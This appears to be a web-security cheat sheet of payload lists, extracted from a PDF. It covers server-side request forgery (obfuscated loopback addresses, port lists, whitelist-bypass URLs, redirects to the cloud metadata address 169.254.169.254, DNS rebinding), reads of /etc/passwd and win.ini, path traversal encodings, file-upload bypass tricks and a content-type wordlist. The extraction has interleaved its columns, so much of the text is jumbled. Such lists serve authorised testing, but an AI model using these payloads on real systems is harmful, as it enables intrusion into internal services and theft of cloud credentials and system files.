SUB.ROOT.TLD:50070 SUB.ROOT.TLD:8095 SUB.ROOT.TLD:3554
SUB.ROOT.TLD:49 SUB.ROOT.TLD:8416
SUB.ROOT.TLD:55000 SUB.ROOT.TLD:9210 SUB.ROOT.TLD:3954
SUB.ROOT.TLD:8023 SUB.ROOT.TLD:8788
SUB.ROOT.TLD:9091 SUB.ROOT.TLD:2100 SUB.ROOT.TLD:3523
SUB.ROOT.TLD:195 SUB.ROOT.TLD:8419
SUB.ROOT.TLD:6363 SUB.ROOT.TLD:6002 SUB.ROOT.TLD:3221
SUB.ROOT.TLD:3005 SUB.ROOT.TLD:8408
SUB.ROOT.TLD:5800 SUB.ROOT.TLD:10554 SUB.ROOT.TLD:3794
SUB.ROOT.TLD:8808 SUB.ROOT.TLD:8432
SUB.ROOT.TLD:7634 SUB.ROOT.TLD:86 SUB.ROOT.TLD:3569
SUB.ROOT.TLD:1500 SUB.ROOT.TLD:8818
SUB.ROOT.TLD:55553 SUB.ROOT.TLD:8030 SUB.ROOT.TLD:1234
SUB.ROOT.TLD:1911 SUB.ROOT.TLD:6512
SUB.ROOT.TLD:6667 SUB.ROOT.TLD:44158 SUB.ROOT.TLD:3556
SUB.ROOT.TLD:8990 SUB.ROOT.TLD:8406
SUB.ROOT.TLD:50050 SUB.ROOT.TLD:9015 SUB.ROOT.TLD:3792
SUB.ROOT.TLD:8765 SUB.ROOT.TLD:8827
SUB.ROOT.TLD:6664 SUB.ROOT.TLD:8444 SUB.ROOT.TLD:3557
SUB.ROOT.TLD:179 SUB.ROOT.TLD:6590
SUB.ROOT.TLD:8545 SUB.ROOT.TLD:23023 SUB.ROOT.TLD:3562
SUB.ROOT.TLD:9994 SUB.ROOT.TLD:8766
SUB.ROOT.TLD:6633 SUB.ROOT.TLD:6352 SUB.ROOT.TLD:3503
SUB.ROOT.TLD:4157 SUB.ROOT.TLD:8424
SUB.ROOT.TLD:6653 SUB.ROOT.TLD:6003 SUB.ROOT.TLD:3551
SUB.ROOT.TLD:9309 SUB.ROOT.TLD:8428
SUB.ROOT.TLD:50100 SUB.ROOT.TLD:7788 SUB.ROOT.TLD:3521
SUB.ROOT.TLD:3080 SUB.ROOT.TLD:8415
SUB.ROOT.TLD:51106 SUB.ROOT.TLD:8018 SUB.ROOT.TLD:3563
SUB.ROOT.TLD:11 SUB.ROOT.TLD:6602
SUB.ROOT.TLD:6668 SUB.ROOT.TLD:9097 SUB.ROOT.TLD:3922
SUB.ROOT.TLD:7535 SUB.ROOT.TLD:8418
SUB.ROOT.TLD:8649 SUB.ROOT.TLD:999 SUB.ROOT.TLD:3558
SUB.ROOT.TLD:9310 SUB.ROOT.TLD:8423
SUB.ROOT.TLD:6697 SUB.ROOT.TLD:9109 SUB.ROOT.TLD:3791
SUB.ROOT.TLD:8811 SUB.ROOT.TLD:8852
SUB.ROOT.TLD:54138 SUB.ROOT.TLD:9014 SUB.ROOT.TLD:3522
SUB.ROOT.TLD:27015 SUB.ROOT.TLD:8421
SUB.ROOT.TLD:55554 SUB.ROOT.TLD:8890 SUB.ROOT.TLD:3559
SUB.ROOT.TLD:8064 SUB.ROOT.TLD:8425
SUB.ROOT.TLD:8728 SUB.ROOT.TLD:9096 SUB.ROOT.TLD:3560
SUB.ROOT.TLD:445 SUB.ROOT.TLD:8851
SUB.ROOT.TLD:8002 SUB.ROOT.TLD:9007 SUB.ROOT.TLD:4700
SUB.ROOT.TLD:9993 SUB.ROOT.TLD:8821
SUB.ROOT.TLD:5025 SUB.ROOT.TLD:9070 SUB.ROOT.TLD:4042
SUB.ROOT.TLD:9308 SUB.ROOT.TLD:6550
SUB.ROOT.TLD:7080 SUB.ROOT.TLD:9205 SUB.ROOT.TLD:4747
SUB.ROOT.TLD:2628 SUB.ROOT.TLD:8838
Server-Side Request Forgery
3 - Loopback Access OR Port Scanning

Unicode Text Converter :80

:443
:7000
:85
:9018
:8026
:5080
:8036
:8854
:8409
:7547 :6379 :9207 :5050 :8412
:8080 :7676 :9898 :8442 :8969
:8089 :3689 :9208 :8027 :8422
:4567 :12000 :9220 :9899 :6262
:8008 :800 :2200 :111 :8830
:8443 :51235 :1023 :13 :8867
:8081 :4899 :9214 :465 :8414
:2087 :1723 :2067 :3120 :8870
:2083 :666 :9093 :6036 :8845
:2082 :3333 :9209 :15 :8427
:5985 :5858 :6006 :8184 :8824
:2086 :8084 :6005 :3443 :8879
:1024 :5801 :9027 :7654 :8407
:8888 :5901 :9084 :8035 :8865
:8000 :6264 :143 :8034 :8875
:8880 :5560 :789 :7465 :8826
:9080 :5577 :9012 :8812 :8814
:81 :9444 :9088 :3460 :8426
:5000 :37215 :5002 :6565 :8413
:49152 :8003 :9550 :37 :8861
:9000 :8999 :9111 :8103 :8836
:8085 :4242 :9988 :17 :8767
:7170 :5984 :2150 :100 :6560
:5001 :5172 :8881 :8118 :8842
:3128 :4282 :9047 :1599 :6650
:8001 :1311 :9955 :9433 :8841
:8090 :90 :9034 :92 :8874
:9999 :9003 :9016 :6601 :8862
:10443 :1200 :9098 :9950 :8832
:9090 :2081 :9046 :7778 :6561
:8083 :5269 :6008 :8110 :8782
:5357 :7081 :9119 :175 :8784
:3000 :8091 :9017 :8024 :8840
:9100 :2323 :70 :6503 :8871
:52869 :2002 :8019 :8038 :8791
:9306 :13579 :9300 :8813 :8825
0177.0000.0000.0001 :82
:88
:4321
:3542
:8042
:9251
:19
:7979
:8869
:8829
:8010 :3541 :7090 :8815 :8621
%5B%3A%3Affff%3A127.0.0.1%5D :4443
:7443
:3780
:3749
:311
:1099
:8104
:8066
:8873
:8622
%253A%253Affff%253A7f00%253A0001 :9443
:10000
:4664
:3306
:8448
:9044
:8405
:8055
:8839
:8853
%252531%252532%252537%25252E%252530%25252E%252530%25252E%252531 :8181 :4782 :9876 :1027 :8817
000000000000000000000000000177.000000000000000000000000000.00000000000000000.001 :9001 :4949 :8017 :8816 :8856
:6443 :11300 :8097 :3479 :8847
127.1 :444
:8086
:8006
:5938
:4100
:44818
:8844
:8935
:8828
:8872

0177.0001.0000..0001 :2096
:7777
:11211
:4840
:6588
:119
:8819
:8105
:8831
:8876
:10001 :8383 :2111 :8700 :8837
127.127.127.127 :8200
:2095
:4063
:3310
:9202
:9199
:6748
:8802
:8623
:8835
:8009 :9101 :9966 :8041 :8637
0x7f.0.0.0x1 :9002
:8800
:11112
:4506
:1080
:1741
:6955
:2020
:3101
:3121
%2531%2532%2537%252E%2530%252E%2530%252E%2531 :6000 :8011 :9050 :4445 :1515
:9009 :1400 :8848 :8108 :447
0177.0.0.01 :9200
:5005
:8899
:8004
:8031
:8033
:8052
:8222
:5280
:3112
:83 :7005 :1471 :7444 :3114
127.25.25.25 :3001
:5555
:21025
:4786
:9189
:9104
:8107
:5500
:3103
:3108

127.0.01 :32400
:1900
:4433
:4369
:8190
:9030
:7700
:5003
:3102
:3105
:6001 :16992 :4117 :8053 :3110
0x7f.0x1.0x1 :8099
:8889
:5431
:16010
:1000
:9445
:5090
:8047
:3107
:3109

http://
:7001 :25001 :9301 :8045 :3113
0177.0.0.1 :50000
:9998
:3388
:23424
:6004
:8401
:8109
:8779
:2030
:3116

0x7f000001 :5006 :8005 :8553 :8804 :3117

https:// /
:5986 :102 :9040 :6662 :3118
:20000 :8989 :9990 :7998 :2080
127.0.0.0 :8123
:8060
:16993
:9013
:8106
:8686
:4001
:8049
:3115
:3104

ssh:// 0177.0.0.0x1
:2222
:84
:8554
:14147
:9222
:9033
:8056
:8877
:3106
:5605

%2f
:8069 :8096 :8032 :22222 :3119

pop3:// 127.10.1 :12345

:888
:8012
:1883
:9221
:8585
:8891
:4010
:23
:5606
:10250 :9004 :9311 :8044 :96
127.00000000.000000.1 :7548 :8015 :993 :8054 :5595

ftp:// %31%32%37%2E%30%2E%30%2E%31
:631
:8098
:2375
:808
:104
:2122
:8805
:8243
:5446
:5596

sftp://
00000000000000000000000000000177.0000000000000.0000000000000000000000000000000.0000000000000000000000000001

%3A%3Affff%3A7f00%3A0001
:5222
:2000
:8112
:8087
:7171
:8043
:3260
:2008
:21379
:35000
:1153
:2126
:902
:1604
:6789
:8820
:1050
:3111
:8057
:6308
:1290
:60129
:5906
:1111
:97
%252f
tftp:// 0177.0001.0001 :5010 :9005 :9992 :8046 :448

#
:2077 :25105 :9203 :8666 :5569
:8126 :4430 :8801 :7493 :4999
127.00.1 :7779 :9102 :9204 :8859 :2003

gopher:// %25E2%2591%25A0%25E2%2591%25A1%25E2%2591%25A6.%25E2%2593%25AA.%25E2%2593%25AA.%25E2%2591%25A0
:7071
:5601
:8139
:7070
:8180
:2376
:503
:8885
:9029
:43
:8803
:843
:685
:3910
:2021
2130706433
%23
:3389 :2455 :9024 :7433 :880

ldap:// 0x0.0x0.0x0.0x0
:8834
:4040
:5007
:8445
:7002
:20256
:8040
:9216
:992
:8733
:8429
:8037
:4002
:5600
:26

dict://
:9943 :25565 :8028 :8403 :994
127.1.01 :9191
:5009
:2404
:9037
:8048
:21
:7401
:8143
:4343
:2233

smtp:// 0x7f.0x1.0x0.0x1
0x547c6e1fd07f000001
:1935
:5900
:8082
:8020
:9295
:28017
:8014
:7010
:8016
:9089
:9025
:9217
:8029
:6605
:9389
:7887
:7537
:6161
:8420
:8810
:4523
:5568
:1028
:5150
:5201
%2523
scp:// 127.1.0.1
:4848
:2480
:4500
:4064
:20547
:8092
:9299
:9682
:9218
:87
:801
:6622
:4200
:180
:4545
:5672 :37777 :9031 :8039 :3838
281472812449793 :8140
:2079
:2379
:52881
:9219
:9690
:8857
:8411
:5597
:2320

[::ffff:7f00:0001] :554
:2345
:9010
:27017
:9108
:9606
:8237
:2048
:5607
:2001
0x00007f.0x00000000.0x00000000000000000.0x0000000000000000001 :3299 :8100 :9019 :6600 :2232
:1433 :8021 :9110 :99 :2010

127.000.000.001 :1521
:6666
:8022
:2332
:9026
:9861
:8249
:8868
:5907
:2012
:49153 :9099 :6007 :555 :5070
①②⑦.⓪.⓪.① :389
:587
:9211
:110
:9048
:8051
:6603
:1947
:5599
:3337
:1177 :8282 :8447 :6543 :62078
127.0.0.64 :9600
:1025
:9212
:32764
:9028
:9704
:6887
:8806
:4118
:4505

0177.1 :9092
:2053
:9213
:7003
:9043
:8866
:8988
:8850
:5454
:2259
:25 :8093 :9743 :3200 :5602
%255B%253A%253Affff%253A127.0.0.1%255D :9944 :3129 :9765 :8513 :5542
:9761 :7014 :771 :5004 :5598
111111111111111101111111000000000000000000000001 :2052 :18245 :9022 :8251 :5609
:3790 :89 :8072 :8833 :2031
[::ffff:127.0.0.1] :4911
:9051
:2761
:8013
:8058
:8094
:8823
:8433
:5592
:5122

①②⑦.⓪.⓪.⓪
:8088 :1026 :6010 :8590 :5603
:9151 :9663 :79 :8822 :5190
:2121 :2762 :9041 :4730 :5591

127.0.0.1 :9160
:2181
:7004
:7999
:7500
:9045
:8586
:8846
:5593
:5209
%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%91%A0 :9869 :9527 :9032 :6102 :3311
:9981 :33060 :9039 :8252 :5590
0x7f.0x0.0x0.0x1 :9530
:636
:8101
:8843
:9500
:9106
:6580
:8863
:5822
:3690
:60001 :9006 :548 :8688 :5494
[0:0:0:0:0:ffff:127.0.0.1] :9042
:10243
:9201
:9082
:8111
:9107
:8402
:8248
:53
:5594

localhost :9633
:9595
:9011
:8182
:9206
:9038
:3002
:8860
:5909
:5604
:9418 :9008 :8071 :8431 :5673
0.0.0.0 :8334
:18081
:8025
:9094
:8849
:502
:8241
:6464
:3950
:5910
:7415 :9997 :91 :8236 :3550
0 :8333
:55442
:5443
:9021
:10134
:9049
:8790
:8858
:5608
:5853

[::] :8500
:8159
:8007
:8050
:6009
:7776
:22
:8807
:5908
:5321
:7474 :9105 :7445 :8864 :2050
[0000::1] :5432
:8991
:8787
:995
:113
:7510
:6511
:8855
:3568
:3951
:9302 :9036 :8789 :8238 :1110
localtest.me :17000
:2154
:9103
:9095
:264
:515
:2443
:6510
:3555
:98

spoofed.burpcollaborator.net :7989
:9305
:9035
:9020
:873
:9991
:8878
:5567
:3952
:3570
:9304 :41800 :8446 :6581 :3548
SUB.ROOT.TLD.127.1.0.1.nip.io :9303
:9307
:221
:8663
:9136
:8602
:8993
:8410
:3566
:3567
:7657 :8887 :8102 :8239 :3793
SUB.ROOT.TLD.0.0.0.0.nip.io :7218
:55443
:5400
:9215
:135
:1962
:8417
:8430
:3953
:3552
:8291 :6080 :8404 :6998 :4043
:11000 :9023 :3100 :8809 :3524
:50070 :8095 :49 :8416 :3554
:55000 :9210 :8023 :8788 :3954
:9091 :2100 :195 :8419 :3523
:6363 :6002 :3005 :8408 :3221
:5800 :10554 :8808 :8432 :3794
:7634 :86 :1500 :8818 :3569
:55553 :8030 :1911 :6512 :1234
:6667 :44158 :8990 :8406 :3556
:50050 :9015 :8765 :8827 :3792
:6664 :8444 :179 :6590 :3557
:8545 :23023 :9994 :8766 :3562
:6633 :6352 :4157 :8424 :3503
:6653 :6003 :9309 :8428 :3551
:50100 :7788 :3080 :8415 :3521
:51106 :8018 :11 :6602 :3563
:6668 :9097 :7535 :8418 :3922
:8649 :999 :9310 :8423 :3558
:6697 :9109 :8811 :8852 :3791
:54138 :9014 :27015 :8421 :3522
:55554 :8890 :8064 :8425 :3559
:8728 :9096 :445 :8851 :3560
:8002 :9007 :9993 :8821 :4700
:5025 :9070 :9308 :6550 :4042
:7080 :9205 :2628 :8838 :4747
Server-Side Request Forgery
4 - Whitelist Tricks

google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://
https://
127.88.23.245:22/+&@google.com:80#[email protected]:80/
ssh:// google.com:80+&@google.com:80#[email protected]:22/
pop3://
ftp://
127.88.23.245:22/[email protected]:80/
sftp:// 127.88.23.245:22/#@www.google.com:80/
tftp:// google.com:80\\@127.88.23.245:22/
gopher://
ldap:// 127.88.23.245$google.com
dict:// 1.1.1.1 &@2.2.2.2# @3.3.3.3/
smtp://
scp:// 127.88.23.245:80;http://google.com:80/

Server-Side Request Forgery

5 - Redirects Response

CVSS Advisor

https://SUB.ROOt.TLD/Path/Redirects?url=http://internal.com/

https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&conten
t-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fak
ext=/j.json

https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXB
wbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json

https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXB
wbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
Server-Side Request Forgery
6 - DNS Rebinding

1u.ms

make-I.P.v.4-rr.1u.ms
http:// make-I-P-v-4-and-I-P-v-4-rr.1u.ms
https://
ssh://
/
pop3:// make-I.P.v.4-rebind-I.P-v.4-rr.1u.ms %2f
ftp:// ROOT.TLD-make-I.P.v.4-rebind-169.254-169.254-rr-ROOT.1u.ms
sftp:// %252f
tftp://
gopher:// make-ip-v6-IPv6-rr.1u.ms #
ldap://
dict://
%23
smtp:// make-cname-ROOT.TLD-rr.1u.ms %2523
scp://

make-hex-IPv4Hex-rr.1u.ms

Server-Side Request Forgery

7 - Reading Local Files

?
%3f
etc/passwd %253f
file:///
/C:\Windows\win.ini
netdoc:// #
%23
%2523
Server-Side Request Forgery
8 - Clouds Metadata

jhaddix

Unicode Text Converter

Mapcidr

┌──(mahmoud㉿mohamed)-[~]
└─$ echo '169.254.169.254' | mapcidr -ip-format 0 -silent | sort -u

0xa9fea9fe
⓪⓪②⑤①｡⓪ⓧⓕⓔ｡④③⑤①⑧
0251.0376.0251.0376
0251.254.169.254
111111111111111110101001111111101010100111111110
⓪⓪②⑤①｡⓪⓪⓪③⑦⑥｡⓪⓪⓪⓪②⑤①｡⓪⓪⓪⓪⓪③
⑦⑥
::ffff:a9fe:a9fe
⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ
169%E3%80%82254%E3%80%82169%E3%80%82254
⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥
Instance-data
[::ⓕⓕⓕⓕ :①⑥⑨。②⑤④。⑯⑨。②⑤④ ] /
⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥② %2f
http:// ⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧ %252f
https:// 0xa9.254.0251.0xfe #
⓪ⓧⓐ⑨｡⑯⑥⑧⑨⑥⑥②
%31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34
%23
%2531%2536%2539%252E%2532%2535%2534%252E%2531%2536%2539%252E%2532%2535%2534
%2523
0x23df4f92e5a9fea9fe
⑯⑨。②⑤④。⑯⑨｡②⑤④ /
281473533782526
169｡254｡169｡254/
②⑧⑤②⓪③⑨①⑥⑥
169。254。169。254/
169.254.169.254
④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪
⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ
0xa9.0xfe.0xa9.0xfe
[::①⑥⑨｡②⑤④｡⑯⑨｡②⑤④ ]
aws.oast.online
Path Traversal
1 - Path Traversal Detection

etc/passwd
etc%2fpasswd
etc%252fpasswd
etc\passwd
etc%5cpasswd
etc%255cpasswd
/ etc//passwd
etc/%2fpasswd
;/
etc%2f%2fpasswd
// etc/x/../y/../passwd
\/ etc/x/..%2fy/..%2fpasswd
/./ etc/x/%2e%2e/y/%2e%2e/passwd
%2f etc/x/%2e%2e%2fy/%2e%2e%2fpasswd
%252f etc/passwd%00.css
%u2215 etc%2fpasswd%00.css
. %c0%af etc/passwd?
%e0%80%af etc/passwd%3F
..
%c0%2f etc%E2%88%95passwd
%2e
%E2%88%95 etc%E2%88%96passwd
%252e
%u002e
%c0%2e
%e0%40%ae
%c0ae \ windows/win.ini
%E3%80%82 ;\ windows%2fwin.ini
%E2%80%A5 \\ Windows//win.ini
\.\ Windows\win.ini
%255c windows%5cwin.ini
%255c Windows\\win.ini
C:\windows\win.ini
%u2216
c%3a%5cwindows%5cwin.ini
%c0%5c Windows/x/../win.ini
%c0%80%5c Windows/x/%2e%2e/win.ini
%E2%88%96 Windows/x/..%2fwin.ini
Windows\x\..\win.ini
Windows\x\%2e%2e\win.ini
Windows\x\..%5cwin.ini
Windows/win.ini%00.css
windows%E2%88%95win.ini
windows%E2%88%96win.ini
Path Traversal
2 - Secondary Context Path Traversal Detection

../
..%2f #
..%252f
%2e%2e%2f
%23
%252e%252e%252f %2523
%u002e%u002e%u2215 %u0023
%E3%80%82%E3%80%82%E2%88%95 ?
%3f
%253f
%u003f
..;/ &
..;%2f %26
..;%252f
%2526
%2e%2e%3b%2f
%252e%252e%253b%252f %u0026
%u002e%u002e%u003b%u2215 @
%40
%2540
%u0040
..\ %20
..%5c %2520
..%255c %u0020
%2e%2e%5c %00
%252e%252e%255c
%u002e%u002e%u2216
%u0000
%E3%80%82%E3%80%82%E2%88%96 %0d
%u000d
%E5%98%8D
%0a
..;\
%000a
..;%5c %E5%98%8A
..;%255c %0d%0a
%2e%2e%3b%5c %u000d%000a
%252e%252e%253b%255c %E5%98%8D%E5%98%8A
%u002e%u002e%u003b%u2216
File Upload
1 - Path Traversal OR File Overwrite

file
file?
file%3F
file%253F
/ file#
;/
//
file%23
\/ file%2523
/./
%2f
file.EXT
%252f file.eXt
%u2215
%c0%af
file?.EXT
.
.. %e0%80%af file%3F.EXT
%2e %c0%2f
%E2%88%95
file%253F.EXT
%252e
%u002e file.EXT;.EXT
%c0%2e file.EXT%3B.EXT
%e0%40%ae file.EXT%25%3B.EXT
%c0ae \
%E3%80%82 ;\ file#.EXT
\\ file%23.EXT
\.\
%255c file%2523.EXT
%255c file.EXT.EXT
%u2216
%c0%5c file.EXT?.EXT
%c0%80%5c file.EXT%3F.EXT
%E2%88%96
file.EXT%253F.EXT
file.EXT#.EXT
file.EXT%23.EXT
file.EXT%2523.EXT
file.EXT%00.EXT
File Upload
2 - Content Type AND Extensions Manipulation

Upload Insecure Files

Content Type
file.EXT
Extensions file.E\XT
file.eXt
file.EXT.EXT
Content-Type: FUZZ
file.EXT?.EXT
Content-Type: fUzz
file.EXT%3F.EXT
Content-Type: FUZZ+EXT
file.EXT%253F.EXT
Content-Type: FUZZ; x=x
file.EXT;.EXT
Content-Type: FUZZ; x="x"
file.EXT%3B.EXT
Content-Type: FUZZ;FUZZ
file.EXT%25%3B.EXT
Content-Type: FUZZ;,FUZZ
file.EXT#.EXT
Content-Type: FUZZ;,FUZZ,FUZZ
file.EXT%23.EXT
Content-Type: FUZZ,xxx
file.EXT%2523.EXT
Content-Type: FUZZ xxx
file.EXT%00.EXT
Content-Type: FUZZ(xxx
file.EXT%0d%0a.EXT
Content-Type: FUZZ; x=x, FUZZ, foobar
file.EXT%0a.EXT
file.EXT%250a.EXT
Content-Type: FUZZ file.EXT%0d.EXT
Content-Type: FUZZ file.EXT%250d.EXT

filename="FUZZ" ; filename="FUZZ" filename==="FUZZ"

URL Encoding
EXT Double URL Encoding
Unicode
Server-Side Request Forgery
3 - Content-Type Wordlist

application/vnd.geoplan
application/vnd.geospace
application/andrew-inset application/vnd.spotfire.sfs
application/vnd.gerber
application/applixware application/vnd.sqlite3 audio/vnd.ms-playready.media.pya
application/vnd.gmx
application/atom+xml application/vnd.stardivision.calc audio/vnd.nuera.ecelp4800
application/vnd.google-earth.kml+xml
application/atomcat+xml application/vnd.stardivision.draw audio/vnd.nuera.ecelp7470
application/vnd.google-earth.kmz
application/atomsvc+xml application/vnd.stardivision.impress audio/vnd.nuera.ecelp9600
application/vnd.grafeq
application/ccxml+xml application/vnd.stardivision.math audio/vnd.rip
application/vnd.groove-account
application/ccxml+xml, application/vnd.stardivision.writer audio/vnd.wav
application/vnd.groove-help
application/cdmi-capability application/vnd.stardivision.writer-global audio/vnd.wave
application/vnd.groove-identity-message
application/cdmi-container application/vnd.stepmania.stepchart audio/wav
application/vnd.groove-injector
application/cdmi-domain application/vnd.sun.xml.calc audio/wave
application/vnd.groove-tool-message
application/cdmi-object application/vnd.sun.xml.calc.template audio/webm
application/vnd.groove-tool-template
application/cdmi-queue application/vnd.sun.xml.draw audio/x-aac
application/vnd.groove-vcard
application/cu-seeme application/vnd.sun.xml.draw.template audio/x-aiff
application/vnd.hal+xml
application/davmount+xml application/vnd.sun.xml.impress audio/x-matroska
application/vnd.handheld-entertainment+xml
application/dssc+der application/vnd.sun.xml.impress.template audio/x-mpegurl
application/vnd.hbci
application/dssc+xml application/vnd.sun.xml.math audio/x-ms-wax
application/vnd.hhe.lesson-player
application/ecmascript application/vnd.sun.xml.writer audio/x-ms-wma
application/vnd.hp-hpgl
application/emma+xml application/vnd.sun.xml.writer.global audio/x-pn-realaudio
application/vnd.hp-hpid
application/epub+zip application/vnd.sun.xml.writer.template audio/x-pn-realaudio-plugin
application/vnd.hp-hps
application/exi application/vnd.sus-calendar audio/x-pn-wav
application/vnd.hp-jlyt
application/font-tdpfr application/vnd.svd audio/x-wav
application/vnd.hp-pcl
application/gpx+xml application/vnd.symbian.install chemical/x-cdx
application/vnd.hp-pclxl
application/gzip application/vnd.syncml+xml chemical/x-cif
application/vnd.hydrostatix.sof-data
application/hyperstudio application/vnd.syncml.dm+wbxml chemical/x-cmdf
application/vnd.hzn-3d-crossword
application/ipfix application/vnd.syncml.dm+xml chemical/x-cml
application/vnd.ibm.minipay
application/java-archive application/vnd.tao.intent-module-archive chemical/x-csml
application/vnd.ibm.modcap
application/java-serialized-object application/vnd.tmobile-livetv chemical/x-xyz
application/vnd.ibm.rights-management
application/java-vm application/vnd.trid.tpt font/otf
application/vnd.ibm.secure-container
application/javascript application/vnd.triscape.mxs font/woff
application/vnd.iccprofile
application/json application/vnd.trueapp font/woff2
application/vnd.igloader
application/ld+json application/vnd.ufdl gcode
application/vnd.immervision-ivp
application/lost+xml application/vnd.uiq.theme image/avif
application/vnd.immervision-ivu
application/mac-binhex40 application/vnd.umajin image/bmp
application/vnd.insors.igm
application/mac-compactpro application/vnd.unity image/cgm
application/vnd.intercon.formnet
application/mads+xml application/vnd.uoml+xml image/g3fax
application/vnd.intergeo
application/marc application/vnd.vcx image/gif
application/vnd.intu.qbo
application/marcxml+xml application/vnd.visio image/heic
application/vnd.intu.qfx
application/mathematica application/vnd.visio2013 image/ief
application/vnd.ipunplugged.rcprofile
application/mathml+xml application/vnd.visionary image/jpeg
application/vnd.irepository.package+xml
application/mbox application/vnd.vsf image/ktx
application/vnd.is-xpr
application/mediaservercontrol+xml application/vnd.wap.sic image/pjpeg
application/vnd.isac.fcs
application/metalink4+xml application/vnd.wap.slc image/png
application/vnd.jam
application/mets+xml application/vnd.wap.wbxml image/prs.btif
application/vnd.jcp.javame.midlet-rms
application/mods+xml application/vnd.wap.wmlc image/svg+xml
application/vnd.jisp
application/mp21 application/vnd.wap.wmlscriptc image/tiff
application/vnd.joost.joda-archive
application/mp4 application/vnd.wap.xhtml+xml image/vnd.adobe.photoshop
application/vnd.kahootz
application/msword application/vnd.webturbo image/vnd.dece.graphic
application/vnd.kde.karbon
application/mxf application/vnd.wolfram.player image/vnd.djvu
application/vnd.kde.kchart
application/octet-stream application/vnd.wordperfect image/vnd.dvb.subtitle
application/vnd.kde.kformula
application/oda application/vnd.wqd image/vnd.dwg
application/vnd.kde.kivio
application/oebps-package+xml application/vnd.wt.stf image/vnd.dxf
application/vnd.kde.kontour
application/ogg application/vnd.xara image/vnd.fastbidsheet
application/vnd.kde.kpresenter
application/onenote application/vnd.xfdl image/vnd.fpx
application/vnd.kde.kspread
application/patch-ops-error+xml application/vnd.yamaha.hv-dic image/vnd.fst
application/vnd.kde.kword
application/pdf application/vnd.yamaha.hv-script image/vnd.fujixerox.edmics-mmr
application/vnd.kenameaapp
application/pgp-encrypted application/vnd.yamaha.hv-voice image/vnd.fujixerox.edmics-rlc
application/vnd.kidspiration
application/pgp-signature application/vnd.yamaha.openscoreformat image/vnd.ms-modi
application/vnd.kinar
application/pics-rules application/vnd.yamaha.openscoreformat.osfpvg+xml image/vnd.net-fpx
application/vnd.koan
application/pkcs10 application/vnd.yamaha.smaf-audio image/vnd.wap.wbmp
application/vnd.kodak-descriptor
application/pkcs7-mime application/vnd.yamaha.smaf-phrase image/vnd.xiff
application/vnd.las.las+xml
application/pkcs7-signature application/vnd.yellowriver-custom-menu image/webp
application/vnd.llamagraphics.life-balance.desktop
application/pkcs8 application/vnd.zul image/x-adobe-dng
application/vnd.llamagraphics.life-balance.exchange+xml
application/pkix-attr-cert application/vnd.zzazz.deck+xml image/x-canon-cr2
application/vnd.lotus-1-2-3
application/pkix-cert application/voicexml+xml image/x-canon-crw
application/vnd.lotus-approach
application/pkix-crl application/wasm image/x-citrix-jpeg
application/vnd.lotus-freelance
application/pkix-pkipath application/widget image/x-citrix-png
application/vnd.lotus-notes
application/pkixcmp application/winhlp image/x-cmu-raster
application/vnd.lotus-organizer
application/pls+xml application/wsdl+xml image/x-cmx
application/vnd.lotus-screencam
application/postscript application/wspolicy+xml image/x-epson-erf
application/vnd.lotus-wordpro
application/prql application/x-7z-compressed image/x-freehand
application/vnd.macports.portpkg
application/prs.cww application/x-abiword image/x-fuji-raf
application/vnd.mcd
application/pskc+xml application/x-ace-compressed image/x-icns
application/vnd.medcalcdata
application/rdf+xml application/x-apple-diskimage image/x-icon
application/vnd.mediastation.cdkey
application/reginfo+xml application/x-authorware-bin image/x-kodak-dcr
application/vnd.mfer
application/relax-ng-compact-syntax application/x-authorware-map image/x-kodak-k25
application/vnd.mfmp
application/resource-lists+xml application/x-authorware-seg image/x-kodak-kdc
application/vnd.micrografx.flo
application/resource-lists-diff+xml application/x-bcpio image/x-minolta-mrw
application/vnd.micrografx.igx
application/rls-services+xml application/x-bittorrent image/x-nikon-nef
application/vnd.mif
application/rsd+xml application/x-bzip image/x-olympus-orf
application/vnd.mobius.daf
application/rss+xml application/x-bzip2 image/x-panasonic-raw
application/vnd.mobius.dis
application/rtf application/x-cdf image/x-pcx
application/vnd.mobius.mbk
application/sbml+xml application/x-cdlink image/x-pentax-pef
application/vnd.mobius.mqy
application/scvp-cv-request application/x-chat image/x-pict
application/vnd.mobius.msl
application/scvp-cv-response application/x-chess-pgn image/x-png
application/vnd.mobius.plc
application/scvp-vp-request application/x-cpio image/x-portable-anymap
application/vnd.mobius.txf
application/scvp-vp-response application/x-csh image/x-portable-bitmap
application/vnd.mophun.application
application/sdp application/x-debian-package image/x-portable-graymap
application/vnd.mophun.certificate
application/set-payment-initiation application/x-director image/x-portable-pixmap
application/vnd.mozilla.xul+xml
application/set-registration-initiation application/x-doom image/x-rgb
application/vnd.ms-artgalry
application/shf+xml application/x-dtbncx+xml image/x-sigma-x3f
application/vnd.ms-cab-compressed
application/smil+xml application/x-dtbook+xml image/x-sony-arw
application/vnd.ms-excel
application/sparql-query application/x-dtbresource+xml image/x-sony-sr2
application/vnd.ms-excel.addin.macroenabled.12
application/sparql-results+xml application/x-dvi image/x-sony-srf
application/vnd.ms-excel.sheet.binary.macroenabled.12
application/srgs application/x-font-bdf image/x-xbitmap
application/vnd.ms-excel.sheet.macroenabled.12
